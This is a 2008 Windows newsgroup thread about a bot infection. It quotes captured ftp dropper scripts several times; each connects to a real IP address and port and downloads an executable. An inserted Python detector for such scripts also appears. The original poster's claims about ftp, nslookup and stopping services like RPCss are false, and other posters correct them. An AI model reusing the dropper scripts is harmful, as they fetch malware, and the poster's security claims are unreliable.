Guest Terry Mester
Posted March 31, 2008

I have discovered how Spammers are able to access people's Computers to spew out their Spyware garbage, and it is Microsoft's OS which has made this possible! Spammers utilize two commands: the "nslookup" Command and the "ftp" Command found in c:\winnt\system32 -- which you can review in the Windows Help Menu. Spammers can also use a HTML E-Mail you open on your Computer while logged onto the Internet to download a Virus. Those E-Mails you get from friends telling you to forward it on to others, in order to get good luck or money, are nothing but a SCAM perpetrated by the Spammers! DELETE those E-Mails -- DO NOT open them!!! Last month after separately opening two of those E-Mails, I ended up with a Virus on my Computer spewing out data over the Internet, and also the following two Text Files given the name "i" under the 'winnt' Directory.

--- \winnt\i
open 136.145.69.79 2755
user 1 1
get kp.exe
quit
--- \winnt\i
open 208.111.5.228 2755
user 1 1
get 2k3.exe
quit
---

The Virus Commands I subsequently found under the 'winnt' or 'system32' Directories corresponded to the two ".exe" Files named in those two Text Files. I didn't know where those 4 Command Lines in those "i" Files were executable until just today when I looked up the "ftp" Command in Help. Those are 4 sub-commands which caused my Computer to open up the said IP Address and Port#, log in as the user 1 1, download the Virus Command, and then quit "ftp". Since I'm a Dial-up user, I immediately noticed something wrong because this immediately clogged up my Internet Connection. A High Speed user might not notice anything!

It is unbelievable, but the "ftp" Command enables the Spammer to log onto your Computer WITHOUT using an ID and Password! Further, "ftp" enables the Spammer to prevent you from seeing what it is doing on your Computer!!! I'm not kidding! Further still, the "nslookup" Command enables the Spammer to find out your IP Numbers and Computer ID so that he can use the "ftp" Command! It is as if Microsoft specifically designed these two Commands to help Spammers! As far as I can tell, you cannot disable either of these Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to "nslookup.exe.rename" in order to make them non-executable, but I don't think this will solve the problem. Would a Microsoft Corporation technician please inform us if these two Command functions can be disabled? If not, Microsoft needs to IMMEDIATELY provide a Service Pack or update to enable these two functions to be disabled using the "net stop / start" Command. With these functions disabled, a Firewall Application becomes completely unnecessary!

Guest The Kat
Posted March 31, 2008

Re: *** VIRUS WARNING!!! ***

On Sun, 30 Mar 2008 20:59:00 -0700, Terry Mester <TerryMester@discussions.microsoft.com> wrote:

>I have discovered how Spammers are able to access people's Computers to spew
>out their Spyware garbage, and it is Microsoft's OS which has made this
>possible! Spammers utilize two commands: the "nslookup" Command and the
>"ftp" Command found in c:\winnt\system32

YOU are a moron, and shouldn't be allowed to use a computer.

--
Lumber Cartel (tinlc) #2063. Spam this account at your own risk.
This sig censored by the Office of Home, Land & Planet Insecurity...
Remove XYZ to email me

Guest Terry Mester
Posted March 31, 2008

Re: *** VIRUS WARNING!!! ***

YOU are probably one of those detestable Spammers, and you're worried that I've discovered your technique!

"The Kat" wrote:
> YOU are a moron, and shouldn't be allowed to use a computer.

Guest Pegasus (MVP)
Posted March 31, 2008

Re: *** VIRUS WARNING!!! ***

"Terry Mester" <TerryMester@discussions.microsoft.com> wrote in message news:43465527-82B7-4AA1-A05F-81086E0A8BCA@microsoft.com...
> I have discovered how Spammers are able to access people's Computers to spew
> out their Spyware garbage, and it is Microsoft's OS which has made this
> possible! Spammers utilize two commands: the "nslookup" Command and the
> "ftp" Command found in c:\winnt\system32 -- which you can review in the
> Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
> Computer while logged onto the Internet to download a Virus. Those E-Mails
> you get from friends telling you to forward it on to others, in order to get
> good luck or money, are nothing but a SCAM perpetrated by the Spammers!
> DELETE those E-Mails -- DO NOT open them!!!

The problem is not ftp.exe or nslookup.exe - it's the stuff you received from "friends", promising you "luck" or "money". You need to become a little more computer-savvy: Don't open attachments sent by strangers, and be very careful when opening attachments sent by friends. Chances are that they haven't got the faintest idea about the stuff they're sending about: Fun programs, screen savers, elaborate "jokes" - all of them can spell trouble.

Renaming ftp.exe or nslookup.exe is pointless. Change your habits and install/maintain a good virus scanner.

Guest David H. Lipman
Posted April 1, 2008

Re: *** VIRUS WARNING!!! ***

From: "Terry Mester" <TerryMester@discussions.microsoft.com>

| I have discovered how Spammers are able to access people's Computers to spew
| out their Spyware garbage, and it is Microsoft's OS which has made this
| possible! Spammers utilize two commands: the "nslookup" Command and the
| "ftp" Command found in c:\winnt\system32 -- which you can review in the
| Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
| Computer while logged onto the Internet to download a Virus. Those E-Mails
| you get from friends telling you to forward it on to others, in order to get
| good luck or money, are nothing but a SCAM perpetrated by the Spammers!
| DELETE those E-Mails -- DO NOT open them!!! Last month after separately
| opening two of those E-Mails, I ended up with a Virus on my Computer spewing
| out data over the Internet, and also the following two Text Files given the
| name "i" under the 'winnt' Directory.
| --- \winnt\i
| open 136.145.69.79 2755
| user 1 1
| get kp.exe
| quit
| --- \winnt\i
| open 208.111.5.228 2755
| user 1 1
| get 2k3.exe
| quit
| ---
| The Virus Commands I subsequently found under the 'winnt' or 'system32'
| Directories corresponded to the two ".exe" Files named in those two Text
| Files. I didn't know where those 4 Command Lines in those "i" Files were
| executable until just today when I looked up the "ftp" Command in Help.
| Those are 4 sub-commands which caused my Computer to open up the said IP
| Address and Port#, log in as the user 1 1, download the Virus Command, and
| then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
| wrong because this immediately clogged up my Internet Connection. A High
| Speed user might not notice anything!
|
| It is unbelievable, but the "ftp" Command enables the Spammer to log onto
| your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
| Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
| not kidding! Further still, the "nslookup" Command enables the Spammer to
| find out your IP Numbers and Computer ID so that he can use the "ftp"
| Command! It is as if Microsoft specifically designed these two Commands to
| help Spammers! As far as I can tell, you cannot disable either of these
| Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
| "nslookup.exe.rename" in order to make them non-executable, but I don't think
| this will solve the problem. Would a Microsoft Corporation technician please
| inform us if these two Command functions can be disabled? If not, Microsoft
| needs to IMMEDIATELY provide a Service Pack or update to enable these two
| functions to be disabled using the "net stop / start" Command. With these
| functions disabled, a Firewall Application becomes completely unnecessary!

This is NOT new and is well known in the anti malware community. What you have described is a BOT action. If it is on the PC, the PC is already infected. The infector creates a script and uses the FTP command to download its peer software. A batch file then uses the script to automate the FTP process.

If file protection is properly working, you can not rename FTP.EXE as it will just reinstate itself.

NSLOOKUP has nothing to do with it.

What this shows is that you did not have anti virus installed and/or properly updated.

BTW: Microsoft is fully aware of the situation and I guarantee you that there will be no patch because you have to be infected first before the FTP.EXE command will be used maliciously.

You should also know there are Trojans that hijack the BITS Service to download peers.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp
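
The reply above describes a bot that writes a small command script and lets ftp.exe run it unattended to fetch the next stage. As an added example (not part of any post in this thread), the following Python sketch triages small text files for that pattern; the sample file contents are constructed, and the extension list, size limit and heuristics are assumptions rather than a complete detection rule.

```python
import os
import re

# Extensions Windows runs directly; a scripted "get" of one of these is the red flag.
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".dll"}
MAX_SCRIPT_BYTES = 4096  # assumption: dropper scripts are tiny, so skip large files

# Constructed samples. The first mirrors the shape of the "i" files quoted in the
# thread, using a documentation-range address and a placeholder file name.
SAMPLE_DROPPER = "open 192.0.2.10 2755\nuser 1 1\nget sample.exe\nquit\n"
SAMPLE_BENIGN = "open ftp.example.org\nuser anonymous guest@example.org\nget readme.txt\nbye\n"
SAMPLE_NOT_SCRIPT = "Meeting notes: open question about the user guide.\n"


def parse_ftp_script(text):
    """Extract server, port, login and requested files from ftp command-script text."""
    info = {"host": None, "port": None, "user": None, "downloads": [], "quits": False}
    for raw in text.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            info["host"] = args[0]
            if len(args) > 1 and args[1].isdigit():
                info["port"] = int(args[1])
        elif cmd == "user" and args:
            info["user"] = args[0]
        elif cmd in ("get", "recv", "mget") and args:
            # get/recv: first argument is the remote file; mget: every argument is
            info["downloads"].extend(args if cmd == "mget" else args[:1])
        elif cmd in ("quit", "bye"):
            info["quits"] = True
    return info


def assess(text):
    """Return the reasons (possibly none) a script looks like an unattended dropper stage."""
    info = parse_ftp_script(text)
    reasons = []
    if not (info["host"] and info["downloads"]):
        return reasons  # not a complete open-and-download script
    exes = [f for f in info["downloads"]
            if os.path.splitext(f)[1].lower() in EXECUTABLE_EXTS]
    if exes:
        reasons.append("fetches executable: " + ", ".join(exes))
    if info["port"] not in (None, 21):
        reasons.append("non-standard FTP port %d" % info["port"])
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", info["host"]):
        reasons.append("server given as bare IP address")
    if exes and info["quits"]:
        reasons.append("runs unattended (ends with quit)")
    return reasons


def scan_directory(root):
    """Yield (path, reasons) for each small file under root that assess() flags."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > MAX_SCRIPT_BYTES:
                    continue
                with open(path, "r", errors="ignore") as fh:
                    reasons = assess(fh.read())
            except OSError:
                continue  # unreadable or vanished file: skip it
            if reasons:
                yield path, reasons


if __name__ == "__main__":
    for label, sample in (("dropper-like", SAMPLE_DROPPER),
                          ("benign", SAMPLE_BENIGN),
                          ("not a script", SAMPLE_NOT_SCRIPT)):
        print(label, "->", assess(sample) or "no findings")
```

A hit means the machine was already running malicious code when the file was written, so treat it as a lead for cleanup rather than as the infection itself.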

Guest Terry Mester
Posted April 1, 2008

Re: *** VIRUS WARNING!!! ***

Pegasus (MVP) 3/31/2008 2:47 AM PST
"You need to become a little more computer-savvy: Don't open attachments sent by strangers, and be very careful when opening attachments sent by friends. ... Renaming ftp.exe or nslookup.exe is pointless. Change your habits and install/maintain a good virus scanner."

I was not referring to opening "executable" E-Mail Attachments (.exe, .com, .bat, .cmd). I'm talking about the abilities of an HTML (as opposed to Plain Text) E-Mail. Within about 3 Seconds of "viewing" an HTML E-Mail, it has the ability to create a Text File on the Hard Drive -- as with the two Files above. You don't need to open any type of Attachment. It is unsafe to even LOOK at these Junk E-Mails! I now know better, and I'm simply warning others. As for a Virus Scanner / Firewall, I have a Pentium III Computer, and it slows my Computer down too much and so I had to disable it. This problem is the exclusive fault of Microsoft who has produced defective security protocols in its Operating Systems -- unlike Apple and Linux!

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"The infector creates a script and uses the FTP command to download its peer software."

I know this. The point of this Thread is to warn people that an HTML E-Mail (Body) can create this Script Text File -- you don't have to open any Attachment, and I didn't open any!

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"If file protection is properly working, you can not rename FTP.EXE as it will just reinstate itself."

You are 100% correct. I only realized this after posting this Thread.

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"NSLOOKUP has nothing to do with it."

In my personal case, nslookup probably wasn't used. However, nslookup would definitely enable you to spam a specific person's Computer as long as you know their Internet Server. If you're out to breach a specific Computer, nslookup is what you need to do it.

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"What this shows is that you did not have anti virus installed and/or properly updated.
BTW: Microsoft is fully aware of the situation and I guarantee you that there will be no patch because you have to be infected first before the FTP.EXE command will be used maliciously."

As I mentioned above, I cannot install a Firewall because I only have a Pentium III with 128M of RAM. I haven't been infected since February 21st when I last viewed such an E-Mail. I have since been undertaking the following measures in a Batch Command to protect my Computer before logging onto the Internet:

net stop "remote access auto connection manager"
net stop "remote access connection manager"
net stop "routing and remote access"
net stop "remote registry service"
net stop "RPClocator"
net stop "RPCss"
net stop "messenger"
net stop "net logon"

I'm not certain how much protection this provides me. I also now generally use the Internet only while logged into my Computer as a regular "user" and not an "administrator".

________________________________________
David H. Lipman 3/31/2008 5:52 PM PST
"You should also know there are Trojans that hijack the BITS Service to download peers."

I'm not familiar with this "BITS Service" you refer to. Can you elaborate further?

Guest What's in a Name?
Posted April 1, 2008

Re: *** VIRUS WARNING!!! ***

Terry Mester after much thought, came up with this jewel:
> Pegasus (MVP) 3/31/2008 2:47 AM PST
> "You need to become a little more computer-savvy: Don't open
> attachments sent by strangers, and be very careful when opening
> attachments sent by friends. ... Renaming ftp.exe or nslookup.exe is
> pointless. Change your habits and install/maintain a good virus
> scanner. "
>
> I was not referring to opening "executable" E-Mail Attachments (.exe,
> .com, .bat, .cmd). I'm talking about the abilities of an HTML (as
> opposed to Plain Text) E-Mail. Within about 3 Seconds of "viewing"
> an HTML E-Mail, it has the ability to create a Text File on the Hard
> Drive -- as with the two Files above. You don't need to open any
> type of Attachment. It is unsafe to even LOOK at these Junk E-Mails!
> I now know better, and I'm simply warning others. As for a Virus
> Scanner / Firewall, I have a Pentium III Computer, and it slows my
> Computer down too much and so I had to disable it. This problem is
> the exclusive fault of Microsoft who has produced defective security
> protocols in its Operating Systems -- unlike Apple and Linux!

You have no idea what you're talking about. There are security defects in all OSes.

>
> ________________________________________
> David H. Lipman 3/31/2008 5:52 PM PST
> " The infector creates a script and uses the FTP command to download
> its peer software. "
>
> I know this. The point of this Thread is to warn people that an HTML
> E-Mail (Body) can create this Script Text File -- you don't have to
> open any Attachment, and I didn't open any!

Set your e-mail client to "text only".

>
> ________________________________________
> David H. Lipman 3/31/2008 5:52 PM PST
> " If file protection is properly working, you can not rename FTP.EXE
> as it will just reinstate itself. "
>
> You are 100% correct. I only realized this after posting this Thread.
>
> ________________________________________
> David H. Lipman 3/31/2008 5:52 PM PST
> " NSLOOKUP has nothing to do with it."
>
> In my personal case, nslookup probably wasn't used. However,
> nslookup would definitely enable you to spam a specific person's
> Computer as long as you know their Internet Server. If you're out to
> breach a specific Computer, nslookup is what you need to do it.
>
> ________________________________________
> David H. Lipman 3/31/2008 5:52 PM PST
> "What this shows is that you did not have anti virus installed and/or
> properly updated.
> BTW: Microsoft is fully aware of the situation and I guarantee you
> that there will be no patch because you have to be infected first
> before the FTP.EXE command will be used maliciously."
>
> As I mentioned above, I cannot install a Firewall because I only have
> a Pentium III with 128M of RAM.

Buy more RAM (the cost has dropped) and a NAT router (under $50 US) with a built-in firewall. AntiVir uses very little RAM. So does ThreatFire. GhostWall firewall is very small also.

> I haven't been infected since
> February 21st when I last viewed such an E-Mail.

You need a more secure e-mail client - try Thunderbird.

> I have since been
> undertaking the following measures in a Batch Command to protect my
> Computer before logging onto the Internet:
> net stop "remote access auto connection manager"
> net stop "remote access connection manager"
> net stop "routing and remote access"
> net stop "remote registry service"
> net stop "RPClocator"
> net stop "RPCss"
> net stop "messenger"
> net stop "net logon"
> I'm not certain how much protection this provides me. I also now
> generally use the Internet only while logged into my Computer as a
> regular "user" and not an "administrator".
>

You should open services and disable from there.

> ________________________________________
> David H. Lipman 3/31/2008 5:52 PM PST
> "You should also know there are Trojans that hijack the BITS Service
> to download peers."
>
> I'm not familiar with this "BITS Service" you refer to. Can you
> elaborate further?

Google is your friend

max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
I was lost, but now I'm blind.

Guest Terry Mester
Posted April 1, 2008

Re: *** VIRUS WARNING!!! ***

What's in a Name? 3/31/2008 8:46 PM PST
"Terry Mester after much thought,came up with this jewel:"

ANS: Going by this comment and the quotes you provided in your Post, I think you are confusing the Original Poster's comments with my answers. I had put the OP's comments in "quotes".

________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
"There are security defects in all OSes."

ANS: I'm sure that Apple and Linux have some security problems, but I'm also sure you would agree that Microsoft has a very high number of problems. Don't you think it should be possible to turn 'ftp' off!

________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
"Buy more RAM(the cost has dropped) and a NAT router(under $50 US)"

ANS: My main problem is that my Processor is only 935 MHz. I can buy more Memory, however, it has to be the same company brand! When I tried installing a different brand of SIMM Memory Chip on my former Computer, the Processor wouldn't recognize it! Can you explain that?

________________________________________
What's in a Name? 3/31/2008 8:46 PM PST
"You need a more secure e-mail client-try Thunderbird."

ANS: I have been using Thunderbird for 2 years. However, I don't think you can expect TBird to scan the contents of an HTML Message. Those two "i" Text Files put onto my Hard Drive were pretty benign. I now know better than to view such a Message, and I always review my E-Mail "offline" so that nothing can get downloaded from a Message. I believe the last time this happened to me was from a Message on Hotmail -- which of course has to be opened "online". I now know better than to open them. It is vitally important for Internet users to know that you can get infected by just 'looking' at a spam E-Mail without an Attachment, and to know that these Messages telling you to forward it on are a new spammer technique. I might still have the original Message on my Hotmail Account. If you're interested in scrutinizing it, I could forward it to you.

Guest David H. Lipman
Posted April 1, 2008

Re: *** VIRUS WARNING!!! ***

From: "Terry Mester" <TerryMester@discussions.microsoft.com>

| Pegasus (MVP) 3/31/2008 2:47 AM PST
| "You need to become a little more computer-savvy: Don't open attachments
| sent by strangers, and be very careful when opening attachments sent by
| friends. ... Renaming ftp.exe or nslookup.exe is pointless. Change your
| habits and install/maintain a good virus scanner. "
|
| I was not referring to opening "executable" E-Mail Attachments (.exe, .com,
| .bat, .cmd). I'm talking about the abilities of an HTML (as opposed to Plain
| Text) E-Mail. Within about 3 Seconds of "viewing" an HTML E-Mail, it has the
| ability to create a Text File on the Hard Drive -- as with the two Files
| above. You don't need to open any type of Attachment. It is unsafe to even
| LOOK at these Junk E-Mails! I now know better, and I'm simply warning
| others. As for a Virus Scanner / Firewall, I have a Pentium III Computer,
| and it slows my Computer down too much and so I had to disable it. This
| problem is the exclusive fault of Microsoft who has produced defective
| security protocols in its Operating Systems -- unlike Apple and Linux!

Add RAM. RAM is cheap Today!
Use anti virus, practice Safe Hex or you will be infected again!

| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| " The infector creates a script and uses the FTP command to download its
| peer software. "
|
| I know this. The point of this Thread is to warn people that an HTML E-Mail
| (Body) can create this Script Text File -- you don't have to open any
| Attachment, and I didn't open any!
|

The HTML did NOT create the BOT script. You may have clicked on a link in the HTML that caused the malware to be installed.

| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| " If file protection is properly working, you can not rename FTP.EXE as it
| will just reinstate itself. "
|
| You are 100% correct. I only realized this after posting this Thread.

I know I was.

|
| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| " NSLOOKUP has nothing to do with it."
|
| In my personal case, nslookup probably wasn't used. However, nslookup would
| definitely enable you to spam a specific person's Computer as long as you
| know their Internet Server. If you're out to breach a specific Computer,
| nslookup is what you need to do it.
|

NSLOOKUP would NOT help "spam". It is purely a name resolution lookup utility and that's all.

| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| "What this shows is that you did not have anti virus installed and/or
| properly updated.
| BTW: Microsoft is fully aware of the situation and I guarantee you that
| there will be no patch because you have to be infected first before the
| FTP.EXE command will be used maliciously."
|
| As I mentioned above, I cannot install a Firewall because I only have a
| Pentium III with 128M of RAM. I haven't been infected since February 21st
| when I last viewed such an E-Mail. I have since been undertaking the
| following measures in a Batch Command to protect my Computer before logging
| onto the Internet:
| net stop "remote access auto connection manager"
| net stop "remote access connection manager"
| net stop "routing and remote access"
| net stop "remote registry service"
| net stop "RPClocator"
| net stop "RPCss"
| net stop "messenger"
| net stop "net logon"
| I'm not certain how much protection this provides me. I also now generally
| use the Internet only while logged into my Computer as a regular "user" and
| not an "administrator".

All you have done is cripple the OS. A completely wrong approach!

| ________________________________________
| David H. Lipman 3/31/2008 5:52 PM PST
| "You should also know there are Trojans that hijack the BITS Service to
| download peers."
|
| I'm not familiar with this "BITS Service" you refer to. Can you elaborate
| further?

BITS is used by the MS Auto Update process for downloading critical and other MS updates.

I again repeat...
Use anti virus software!
Example: AntiVir Free -- http://www.freeav.com

If you are unwilling to use AV software and purchase RAM, disconnect the PC from the Internet.

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp

Guest John John
Posted April 1, 2008

Re: *** VIRUS WARNING!!! ***

Terry Mester wrote:

> ________________________________________
> David H. Lipman 3/31/2008 5:52 PM PST
> "What this shows is that you did not have anti virus installed and/or
> properly updated.
> BTW: Microsoft is fully aware of the situation and I guarantee you that
> there will be no patch because you have to be infected first before the
> FTP.EXE command will be used maliciously."
>
> As I mentioned above, I cannot install a Firewall because I only have a
> Pentium III with 128M of RAM. I haven't been infected since February 21st
> when I last viewed such an E-Mail. I have since been undertaking the
> following measures in a Batch Command to protect my Computer before logging
> onto the Internet:
> net stop "remote access auto connection manager"
> net stop "remote access connection manager"
> net stop "routing and remote access"
> net stop "remote registry service"
> net stop "RPClocator"
> net stop "RPCss"
> net stop "messenger"
> net stop "net logon"
> I'm not certain how much protection this provides me. I also now generally
> use the Internet only while logged into my Computer as a regular "user" and
> not an "administrator".

Why you need to use a batch file to kill services is something only you know. All services can be set to manual start or they can be completely disabled if they truly are unneeded; there isn't much need to use a batch file to kill the above services, as their start behaviour can easily be changed in the Services Management Console. Killing RPCss is a good way to effectively cripple the Windows session; hardly anything works properly without this service!

John

Guest What's in a Name?
Posted April 1, 2008

Re: *** VIRUS WARNING!!! ***

Terry Mester after much thought, came up with this jewel:
> What's in a Name? 3/31/2008 8:46 PM PST
> "Terry Mester after much thought,came up with this jewel:"
>
> ANS: Going by this comment and the quotes you provided in your Post,
> I think you are confusing the Original Poster's comments with my
> answers. I had put the OP's comments in "quotes".
>
> ________________________________________
> What's in a Name? 3/31/2008 8:46 PM PST
> " There are security defects in all OSes. "
>
> ANS: I'm sure that Apple and Linux have some security problems, but
> I'm also sure you would agree that Microsoft has a very high number
> of problems. Don't you think it should be possible to turn 'ftp' off!

I'm not sure about turning off FTP. But about Linux security, here, do some light reading:
http://www.networkworld.com/newsletters/linux/2006/0501linux1.html?fsrc=rss-virusworms

>
> ________________________________________
> What's in a Name? 3/31/2008 8:46 PM PST
> " Buy more RAM(the cost has dropped) and a NAT router(under $50 US)"
>
> ANS: My main problem is that my Processor is only 935 MHz. I can
> buy more Memory, however, it has to be the same company brand! When
> I tried installing a different brand of SIMM Memory Chip on my former
> Computer, the Processor wouldn't recognize it! Can you explain that?
>

I have 2 systems with 666mz/512mb running XPpro just fine. Perhaps there are some changes needed in the BIOS?

> ________________________________________
> What's in a Name? 3/31/2008 8:46 PM PST
> " You need a more secure e-mail client-try Thunderbird."
>
> ANS: I have been using Thunderbird for 2 years. However, I don't
> think you can expect TBird to scan the contents of an HTML Message.
> Those two "i" Text Files put onto my Hard Drive were pretty benign.
> I now know better than to view such a Message, and I always review my
> E-Mail "offline" so that nothing can get downloaded from a Message.
> I believe the last time this happened to me was from a Message on
> Hotmail -- which of course has to be opened "online".

I never use the web interface. I use Thunderbird to check all my mail (hotmail, yahoo, pop3). If you need some help setting up Thunderbird, let me know.

> I now know
> better than to open them. It is vitally important for Internet users
> to know that you can get infected by just 'looking' at a spam E-Mail
> without an Attachment, and to know that these Messages telling you to
> forward it on are a new spammer technique. I might still have the
> original Message on my Hotmail Account. If you're interested in
> scrutinizing it, I could forward it to you.

I guess that HTML needs turned off by default in all e-mail clients.

max
--
Virus Removal http://max.shplink.com/removal.html
Keep Clean http://max.shplink.com/keepingclean.html
Tools http://max.shplink.com/tools.html
Change nomail.afraid.org to gmail.com to reply by email.
I was lost, but now I'm blind.